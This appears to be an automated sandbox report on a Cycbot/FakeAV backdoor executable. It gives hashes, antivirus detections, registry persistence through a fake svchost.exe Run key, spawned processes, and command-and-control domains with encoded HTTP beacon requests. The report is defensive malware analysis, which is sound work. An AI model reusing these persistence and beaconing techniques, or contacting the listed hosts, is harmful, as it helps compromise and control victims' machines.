Analysis Date: 2015-01-17 13:34:35
MD5: 9c3a3687f86657c627a19d8eadf75e8e
SHA1: 100bba39054293d4ecef11b3e749bd530e5fc18e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: a5a4037e595a4507e6dac4069659ebab sha1: 9411ba1d4ed35568b0676ca4c8e8926f60c0d6a8 size: 99840
Section .rdata: md5: a21cd1f313f03a515b4e182d9482c757 sha1: 3c2ca4f9084f68bf6f66dad513ffadc5e45e6067 size: 6144
Section .data: md5: 30cc99db9813019b45823f800b79f30d sha1: 23ca5b96bcb546ebf89126d41b2829cfb399342d size: 15872
Section .rsrc: md5: ba958d4ba5ef6675ba96517062038cbf sha1: d6439fccdc3dad3a8149acffc2f64717007ab4c7 size: 1024
Timestamp: 2005-09-26 05:57:29
Version: PrivateBuild: 1107
FileDescription: Windows Host Process
PEhash: b6f0b6b124d23b1ecc083e1eaff9c1091883b4f6
IMPhash: 7e936230ae518d82d13ba944998ee2fe
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Heur.Conjar.2
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Heur.Conjar.2
AV Authentium: W32/Goolbot.B.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV BullGuard: Gen:Heur.Conjar.2
AV CA (E-Trust Ino): Win32/FakeAV.S!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Agent-215398
AV Dr. Web: Trojan.Fakealert
AV Emsisoft: Gen:Heur.Conjar.2
AV Eset (nod32): Win32/Kryptik.IHW
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/Goolbot.B.gen!Eldorado
AV F-Secure: Gen:Heur.Conjar.2
AV Grisoft (avg): Cryptic.DRH
AV Ikarus: Packed.Win32.Krap
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Packed.Win32.Krap.hy
AV MalwareBytes: Trojan.Agent.Gen
AV Mcafee: BackDoor-EXI.gen.d
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.B
AV MicroWorld (escan): Gen:Heur.Conjar.2
AV Rising: no_virus
AV Sophos: Troj/FakeDpr-A
AV Symantec: Backdoor.Cycbot!gen2
AV Trend Micro: BKDR_CYCBOT.SME
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: {C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: dolbyaudiodevice.com
Winsock DNS: www.google.com
Winsock DNS: zoneck.com
Winsock DNS: motherboardstest.com
Winsock DNS: 127.0.0.1

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Network Details:

DNS: zoneck.com
Type: A
208.79.234.132
DNS: www.google.com
Type: A
64.233.185.99
DNS: www.google.com
Type: A
64.233.185.103
DNS: www.google.com
Type: A
64.233.185.104
DNS: www.google.com
Type: A
64.233.185.105
DNS: www.google.com
Type: A
64.233.185.106
DNS: www.google.com
Type: A
64.233.185.147
DNS: motherboardstest.com
Type: A
204.11.56.45
DNS: protectyourpc-11.com
Type: A
DNS: dolbyaudiodevice.com
Type: A
HTTP GET: http://zoneck.com/images/im133.jpg?tq=gJ4WK%2FSUh7zEhRMw9YLRsrCSUz2rw8a3nNQLabnVsMLElls0rNa1x7KTVjnaoLe2wecnKK7Ql6TH51IortCC5IaGUUmo09LyyZJqtUn5CGFIRQ%3D%3D
User-Agent: gbot/2.3
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://zoneck.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz2rw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GET: http://motherboardstest.com/images/im135.jpg?tq=gL4SK%2FSUh7zEpRMw9JGd5dGwJk6s0824xLMjS9rWwLWyxSE6qaKxpMa1C2m51bCwxbNVK%2B%2FbxUqRSfkIYUhF
User-Agent: gbot/2.3
Flows TCP: 192.168.1.1:1031 ➝ 208.79.234.132:80
Flows TCP: 192.168.1.1:1033 ➝ 64.233.185.99:80
Flows TCP: 192.168.1.1:1034 ➝ 64.233.185.99:80
Flows TCP: 192.168.1.1:1035 ➝ 208.79.234.132:80
Flows TCP: 192.168.1.1:1036 ➝ 204.11.56.45:80

Raw Pcap
Strings
